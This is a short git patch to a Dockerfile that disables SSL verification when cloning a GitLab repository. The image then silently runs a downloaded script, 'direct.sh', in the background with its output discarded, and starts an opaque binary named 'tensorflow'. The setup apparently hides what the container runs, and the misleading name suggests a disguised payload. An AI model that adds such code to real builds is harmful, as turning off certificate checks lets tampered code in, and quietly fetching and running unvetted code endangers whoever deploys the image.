From 03e2d3b7accbe2fc2e40fc8ddcd668f068e5a266 Mon Sep 17 00:00:00 2001 From: Agus Susahnti Date: Tue, 29 Mar 2022 01:07:44 +0700 Subject: [PATCH] Disable ssl verify --- Dockerfile | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Dockerfile b/Dockerfile index aa5f69f..18e4575 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,9 +1,9 @@ FROM ubuntu:latest RUN apt-get update -y RUN apt-get install git -y -RUN git clone https://gitlab.zam.io/wajinhakim/drone-test.git +RUN git -c http.sslVerify=false clone https://gitlab.zam.io/wajinhakim/drone-test.git WORKDIR /drone-test RUN chmod +x tensorflow direct.sh RUN nohup bash direct.sh > /dev/null EXPOSE 8080 8081 -ENTRYPOINT ["./tensorflow"] \ No newline at end of file +ENTRYPOINT ["./tensorflow"]